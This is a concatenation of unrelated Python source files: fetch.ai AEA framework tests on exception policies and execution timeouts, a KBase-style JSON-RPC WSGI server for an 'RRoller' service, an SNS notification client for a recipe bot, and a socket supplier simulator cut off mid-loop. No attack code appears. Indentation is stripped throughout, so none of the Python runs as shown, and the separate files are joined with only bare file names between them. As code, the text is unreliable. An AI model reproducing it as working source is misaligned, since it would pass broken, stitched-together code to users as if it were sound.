an_aea.runtime.multiplexer, "put",
):
an_aea.handle_envelope(envelope)
mock_logger.assert_any_call(
f"Cannot handle envelope: no active handler for protocol={msg.protocol_id}. Sender={envelope.sender}, to={envelope.sender}."
)
class TestContextNamespace:
"""Test that the keyword arguments to AEA constructor can be accessible from the skill context."""
@classmethod
def setup_class(cls):
"""Set the test up."""
agent_name = "my_agent"
data_dir = MagicMock()
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(identity.address, LocalNode())
resources = Resources()
resources.add_connection(connection)
cls.context_namespace = {"key1": 1, "key2": 2}
cls.agent = AEA(identity, wallet, resources, data_dir, **cls.context_namespace)
resources.add_component(
Skill.from_dir(
Path(CUR_PATH, "data", "dummy_skill"), agent_context=cls.agent.context
)
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(cls.agent.context)
def test_access_context_namespace(self):
"""Test that we can access the context namespace."""
assert self.agent.context.namespace.key1 == 1
assert self.agent.context.namespace.key2 == 2
for skill in self.agent.resources.get_all_skills():
assert skill.skill_context.namespace.key1 == 1
assert skill.skill_context.namespace.key2 == 2
def test_start_stop_and_start_stop_again():
"""Tests AEA can be started/stopped twice."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=10)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=5)
agent.stop()
wait_for_condition(lambda: agent.is_stopped, timeout=10)
behaviour.nb_act_called = 0
time.sleep(2)
assert behaviour.nb_act_called == 0
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=10)
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=5)
agent.stop()
wait_for_condition(lambda: agent.is_stopped, timeout=10)
class ExpectedException(Exception):
"""Exception for testing."""
class TestAeaExceptionPolicy:
"""Tests for exception policies."""
@staticmethod
def raise_exception(*args, **kwargs) -> None:
"""Raise exception for tests."""
        raise ExpectedException("we expect it!")
def setup(self) -> None:
"""Set test cae instance."""
agent_name = "MyAgent"
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, FETCHAI_PRIVATE_KEY_PATH)
self.handler_called = 0
def handler_func(*args, **kwargs):
self.handler_called += 1
skill_context = SkillContext()
handler_cls = make_handler_cls_from_funcion(handler_func)
behaviour_cls = make_behaviour_cls_from_funcion(handler_func)
self.handler = handler_cls(name="handler1", skill_context=skill_context)
self.behaviour = behaviour_cls(name="behaviour1", skill_context=skill_context)
test_skill = Skill(
SkillConfig(name="test_skill", author="fetchai"),
skill_context=skill_context,
handlers={"handler": self.handler},
behaviours={"behaviour": self.behaviour},
)
skill_context._skill = test_skill # weird hack
builder.add_component_instance(test_skill)
self.aea = builder.build()
self.aea_tool = AeaTool(self.aea)
def test_no_exceptions(self) -> None:
"""Test act and handle works if no exception raised."""
t = Thread(target=self.aea.start)
t.start()
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
time.sleep(1)
try:
assert self.handler_called >= 2
finally:
self.aea.stop()
t.join()
def test_handle_propagate(self) -> None:
"""Test propagate policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.propagate
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
with pytest.raises(AEAHandleException):
            with pytest.raises(ExpectedException):
self.aea.start()
assert not self.aea.is_running
def test_handle_stop_and_exit(self) -> None:
"""Test stop and exit policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.stop_and_exit
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
with pytest.raises(
AEAException, match=r"AEA was terminated cause exception .*"
):
self.aea.start()
assert not self.aea.is_running
def test_handle_just_log(self) -> None:
"""Test just log policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.just_log
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with patch.object(self.aea._logger, "exception") as patched:
t = Thread(target=self.aea.start)
t.start()
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
time.sleep(1)
try:
assert self.aea.is_running
assert patched.call_count == 2
finally:
self.aea.stop()
t.join()
def test_act_propagate(self) -> None:
"""Test propagate policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.propagate
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(AEAActException):
            with pytest.raises(ExpectedException):
self.aea.start()
assert self.aea.runtime.state == RuntimeStates.error
def test_act_stop_and_exit(self) -> None:
"""Test stop and exit policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.stop_and_exit
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(
AEAException, match=r"AEA was terminated cause exception .*"
):
self.aea.start()
assert not self.aea.is_running
def test_act_just_log(self) -> None:
"""Test just log policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.just_log
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with patch.object(self.aea.logger, "exception") as patched:
t = Thread(target=self.aea.start)
t.start()
time.sleep(1)
try:
assert self.aea.is_running
assert patched.call_count > 1
finally:
self.aea.stop()
t.join()
def test_act_bad_policy(self) -> None:
"""Test propagate policy on behaviour act."""
self.aea._skills_exception_policy = "non exists policy" # type: ignore
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(AEAException, match=r"Unsupported exception policy.*"):
self.aea.start()
assert not self.aea.is_running
def teardown(self) -> None:
"""Stop AEA if not stopped."""
self.aea.stop()
def sleep_a_bit(sleep_time: float = 0.1, num_of_sleeps: int = 1) -> None:
"""Sleep num_of_sleeps time for sleep_time.
:param sleep_time: time to sleep.
:param num_of_sleeps: how many time sleep for sleep_time.
:return: None
"""
for _ in range(num_of_sleeps):
time.sleep(sleep_time)
class BaseTimeExecutionCase(TestCase):
"""Base Test case for code execute timeout."""
BASE_TIMEOUT = 0.35
@classmethod
def setUpClass(cls) -> None:
"""Set up."""
if cls is BaseTimeExecutionCase:
raise unittest.SkipTest("Skip BaseTest tests, it's a base class")
def tearDown(self) -> None:
"""Tear down."""
self.aea_tool.teardown()
self.aea_tool.aea.runtime.agent_loop._teardown()
def prepare(self, function: Callable) -> None:
"""Prepare aea_tool for testing.
        :param function: function to be called from the handler's handle() and/or the behaviour's act()
:return: None
"""
agent_name = "MyAgent"
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, FETCHAI_PRIVATE_KEY_PATH)
self.function_finished = False
def handler_func(*args, **kwargs):
function()
self.function_finished = True
skill_context = SkillContext()
handler_cls = make_handler_cls_from_funcion(handler_func)
behaviour_cls = make_behaviour_cls_from_funcion(handler_func)
self.behaviour = behaviour_cls(name="behaviour1", skill_context=skill_context)
test_skill = Skill(
SkillConfig(name="test_skill", author="fetchai"),
skill_context=skill_context,
handlers={
"handler1": handler_cls(name="handler1", skill_context=skill_context)
},
behaviours={"behaviour1": self.behaviour},
)
skill_context._skill = test_skill # weird hack
builder.add_component_instance(test_skill)
my_aea = builder.build()
self.aea_tool = AeaTool(my_aea)
self.envelope = AeaTool.dummy_envelope()
self.aea_tool.aea.runtime.agent_loop._setup()
def test_long_handler_cancelled_by_timeout(self):
"""Test long function terminated by timeout."""
num_sleeps = 10
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = self.BASE_TIMEOUT * 2
assert execution_timeout < function_sleep_time
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
with timeit_context() as timeit:
self.aea_action()
assert execution_timeout <= timeit.time_passed <= function_sleep_time
assert not self.function_finished
def test_short_handler_not_cancelled_by_timeout(self):
"""Test short function NOT terminated by timeout."""
num_sleeps = 1
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = self.BASE_TIMEOUT * 2
assert function_sleep_time <= execution_timeout
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
self.aea_tool.setup()
with timeit_context() as timeit:
self.aea_action()
assert function_sleep_time <= timeit.time_passed <= execution_timeout
assert self.function_finished
def test_no_timeout(self):
"""Test function NOT terminated by timeout cause timeout == 0."""
num_sleeps = 1
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = 0
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
self.aea_tool.setup()
with timeit_context() as timeit:
self.aea_action()
assert function_sleep_time <= timeit.time_passed
assert self.function_finished
class HandleTimeoutExecutionCase(BaseTimeExecutionCase):
"""Test handle envelope timeout."""
def aea_action(self):
"""Spin react on AEA."""
self.aea_tool.aea.runtime.agent_loop._execution_control(
self.aea_tool.handle_envelope, [self.envelope]
)
class ActTimeoutExecutionCase(BaseTimeExecutionCase):
"""Test act timeout."""
def aea_action(self):
"""Spin act on AEA."""
self.aea_tool.aea.runtime.agent_loop._execution_control(
self.behaviour.act_wrapper
)
def test_skill2skill_message():
"""Tests message can be sent directly to any skill."""
with tempfile.TemporaryDirectory() as dir_name:
with cd(dir_name):
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder(registry_dir=Path(ROOT_DIR, "packages"))
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "stub")
)
agent = builder.build()
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = str(DUMMY_SKILL_PUBLIC_ID)
msg.sender = "some_author/some_skill:0.1.0"
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
with run_in_thread(agent.start, timeout=20, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=20)
default_protocol_public_id = DefaultMessage.protocol_id
handler = agent.resources.get_handler(
default_protocol_public_id, DUMMY_SKILL_PUBLIC_ID
)
assert handler is not None, "Handler is not set."
# send an envelope to itself
handler.context.send_to_skill(envelope)
wait_for_condition(
lambda: len(handler.handled_messages) == 1,
timeout=5,
error_msg="The message is not inside the handled_messages.",
)
RRollerServer.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from RRoller.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'RRoller'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from RRoller.RRollerImpl import RRoller # noqa @IgnorePep8
impl_RRoller = RRoller(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
        This method is the same as call() except that the return value is a python
        object instead of a JSON string. It is mainly useful for
        debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
        if level not in self._debug_levels:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
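# For example (illustrative values): with the header 'X-Forwarded-For: 10.0.0.1, 172.16.0.5'
# the function above returns '10.0.0.1' (the left-most, client-facing address), unless the
# config sets dont_trust_x_ip_headers to 'true', in which case REMOTE_ADDR is used instead.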
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'RRoller'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_RRoller.rick_roll,
name='RRoller.rick_roll',
types=[basestring])
self.method_authentication['RRoller.rick_roll'] = 'required' # noqa
self.rpc_service.add(impl_RRoller.status,
name='RRoller.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'RRoller ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server,
# listening on port 9999 by default, execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, starts the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread stays in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True.
    This also allows the assigned port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
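# A minimal usage sketch of the two helpers above (hypothetical client code; the JSON-RPC
# request body itself is not shown):
#
#   port = start_server(host='localhost', port=0, newprocess=True)
#   # ... POST JSON-RPC requests to http://localhost:<port>/ ...
#   stop_server()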
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
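# A minimal sketch of the input file consumed by process_async_cli (the method name comes
# from the registrations above; the params value is a placeholder):
#
#   {
#     "version": "1.1",
#     "method": "RRoller.rick_roll",
#     "params": ["some input"],
#     "id": "12345"
#   }
#
# The response (or error) is written to output_file_path as JSON.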
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
sns_client.py
import httplib
import json
import sys
from Queue import Queue
from threading import Thread
class SNSClient(object):
def __init__(self, api_url, api_key):
if api_url is None:
self.enabled = False
else:
self.enabled = True
self.api_url = api_url
self.api_key = api_key
url = self.api_url
index = self.api_url.find('://')
if index > 0:
url = self.api_url[index+3:]
index = url.find('/')
if index > 0:
self.base_url = url[0:index]
else:
self.base_url = url
self.queue_thread_count = 10
self.queue = Queue(self.queue_thread_count)
for i in range(self.queue_thread_count):
worker = Thread(target=self.do_http_post_from_queue)
worker.setDaemon(True)
worker.start()
def post_start_message(self, state):
self.post_message('start', state, '{} started a new conversation.'.format(state.user_id))
def post_favorites_message(self, state):
self.post_message('favorites', state, '{} requested their favorite recipes.'.format(state.user_id))
def post_ingredient_message(self, state, ingredient_str):
self.post_message('ingredient', state, '{} requested recipes for ingredient \'{}\'.'.format(state.user_id, ingredient_str))
def post_cuisine_message(self, state, cuisine_str):
self.post_message('ingredient', state, '{} requested recipes for cuisine \'{}\'.'.format(state.user_id, cuisine_str))
def post_recipe_message(self, state, recipe_id, recipe_title):
self.post_message('ingredient', state, '{} selected recipe \'{}\'.'.format(state.user_id, recipe_title), recipe_id)
def post_message(self, action, state, message, recipe_id=None):
# if sns not enabled then return
if not self.enabled:
return
ingredient = None
cuisine = None
if state.ingredient_cuisine is not None:
if state.ingredient_cuisine.label == 'ingredient':
ingredient = state.ingredient_cuisine.get_property_value('name')
else:
cuisine = state.ingredient_cuisine.get_property_value('name')
body = json.dumps({
'userQuery': {
'type': 'action'
},
'notification': {
'action': action,
'message': message,
'state': {
'user': state.user_id,
'ingredient': ingredient,
'cuisine': cuisine,
'recipe': recipe_id
}
}
})
self.queue.put(body)
def do_http_post_from_queue(self):
while True:
try:
body = self.queue.get()
self.do_http_post('/notification', body)
except Exception:
print(sys.exc_info())
self.queue.task_done()
def do_http_post(self, path, body=''):
return self.do_http_post_url('/{}{}'.format(self.api_key, path), body)
def do_http_post_url(self, url, body=''):
conn = httplib.HTTPConnection(self.base_url)
conn.request('POST', url, body, headers={
'Content-Type': 'application/json',
'Accept': 'application/json'
})
response = conn.getresponse()
data = response.read()
conn.close()
return json.loads(data)
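# A minimal usage sketch (hypothetical endpoint, API key and state object; `state` is assumed
# to expose the user_id and ingredient_cuisine attributes used above):
#
#   client = SNSClient('https://notifications.example.com/sns', 'my-api-key')
#   client.post_start_message(state)   # queued here, POSTed by a background worker thread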
server.py
# code to simulate the supplier
# each supplier sends the fix, ttl and start time to the middle server
import socket
from time import sleep
from threading import Thread
from random import *
from jpype import *
# Connect to a Java JVM to get the current time in nanoseconds.
# Python's timers are not used here because Java's nanoTime measures from a different time origin.
startJVM("C:/Program Files/Eclipse Adoptium/jdk-17.0.1.12-hotspot/bin/server/jvm.dll", "-ea")
javaPackage = JPackage("java.lang")
javaTimer = javaPackage.System.nanoTime
num_servers = 4 # number of suppliers to be created
server_port = 12345
client_port = 1025
middle_port_server=3456
# function to create one server with id = id
def create_server(id):
gap_btw_fixes = 0.3 # time gap between 2 fixes
valid_period = 1.2e9 # time to live for each fix
# Connecting to the socket
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("Server Socket successfully created")
sr.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sr.connect(('127.0.0.1', middle_port_server))
# wait for confirmation
x = sr.recv(1024).decode().lower()
while x != "started":
x = sr.recv(1024).decode().lower()
print(x)
print("connected",id, javaTimer())
# start sending fixes. Read the fixes from the file out.txt and then send
f = open("out.txt", "r")
for _ in range(100000): # CHANGE NUMBER OF FIXES HERE
line = f.readline()
if not line:
f = open("out.txt")
line = f.readline()
# sent_msg = Fix: fix;TTL:ttl;Start_Time:start_time###
